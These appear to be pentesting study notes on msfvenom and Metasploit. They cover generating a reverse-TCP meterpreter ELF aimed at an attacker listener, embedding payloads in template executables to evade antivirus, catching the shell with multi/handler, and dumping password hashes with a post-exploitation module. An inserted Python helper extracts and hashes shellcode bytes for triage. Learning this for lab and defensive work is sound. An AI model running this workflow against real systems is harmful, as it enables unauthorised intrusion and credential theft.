Msfvenom
Help menu
$ msfvenom -h
List available options for module type
$ msfvenom -l payloads
$ msfvenom -l encoders
$ msfvenom -l nops
$ msfvenom -l all
Payload option
$ msfvenom -p ...
# eg.
$ msfvenom -p linux/x86/shell_reverse_tcp
Format option
$ msfvenom -f ...
# eg.
$ msfvenom -f elf
$ msfvenom -f exe
Note: The output from msfvenom is the shellcode (typically raw machine code) that can be executed on the target architecture; which shellcode is generated is defined by the -p flag. The -f flag only specifies the format the shellcode is written out in.
Eg. PowerShell
[Byte[]] $buf = 0xfc,0x48,0x83,...
Eg. C
unsigned char buf[] = "\xfc\x48\x83...
Eg. Python
buf = b""
buf += b"\xfc\x48\x8
buf += b"\...
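Triage helper, added here and not part of the original notes: it recovers the raw byte sequence from any of the three text formats shown above (PowerShell byte array, C char array, Python bytes) so that a blob found in a script or document can be hashed and compared against other samples. The sample inputs below are constructed, not real msfvenom output.

```python
"""Normalise msfvenom -f powershell / -f c / -f python text output to raw bytes.

Added example, not from the original notes. All three formats spell every
byte as a two-digit hex escape (0xfc in PowerShell, \\xfc in C and Python),
so one regex over the whole text recovers the bytes in order and ignores
the surrounding syntax (variable names, quotes, '+=' continuation lines).
"""
import hashlib
import re

# 0xNN (PowerShell) or \xNN (C / Python string escapes).
HEX_BYTE = re.compile(r"(?:0x|\\x)([0-9a-fA-F]{2})")


def extract_bytes(text: str) -> bytes:
    """Return the byte sequence encoded in a -f powershell/c/python blob."""
    return bytes(int(h, 16) for h in HEX_BYTE.findall(text))


def triage(text: str) -> dict:
    """Length and SHA-256 of the recovered bytes, for cross-sample comparison.

    Two blobs in different output formats that carry the same shellcode
    produce the same digest, which is what an analyst wants to check.
    """
    data = extract_bytes(text)
    return {"length": len(data), "sha256": hashlib.sha256(data).hexdigest()}


# Constructed samples: the same four bytes written in each of the three formats.
POWERSHELL = "[Byte[]] $buf = 0xfc,0x48,0x83,0xe4"
C_SOURCE = 'unsigned char buf[] = \n"\\xfc\\x48\\x83"\n"\\xe4";'
PYTHON_SRC = 'buf =  b""\nbuf += b"\\xfc\\x48"\nbuf += b"\\x83\\xe4"\n'

if __name__ == "__main__":
    for name, blob in [("powershell", POWERSHELL), ("c", C_SOURCE), ("python", PYTHON_SRC)]:
        print(name, triage(blob))
```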
Template
$ msfvenom -x ...
$ msfvenom --template ...
Either form can be used to specify a custom executable file to be used as the template.
This means the original functionality of the provided executable is preserved, with the addition of the payload specified by the attacker.
The result may bypass AV, etc.
Example
linux/x86/meterpreter/reverse_tcp
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.xxx.xxx LPORT=8000 -f elf > shell.elf
Module to use on the attacking machine to catch a shell
exploit/multi/handler
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx
msf6 exploit(multi/handler) > set lport xxxx
msf6 exploit(multi/handler) > run
Run the shellcode on the target machine
# eg.
$ sudo ./shell.elf
Gain meterpreter shell on the attacker machine
meterpreter >
Using post exploitation hash dump module
meterpreter > background
msf6 exploit(multi/handler) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux ... ...
msf6 exploit(multi/handler) > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > show options
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run
...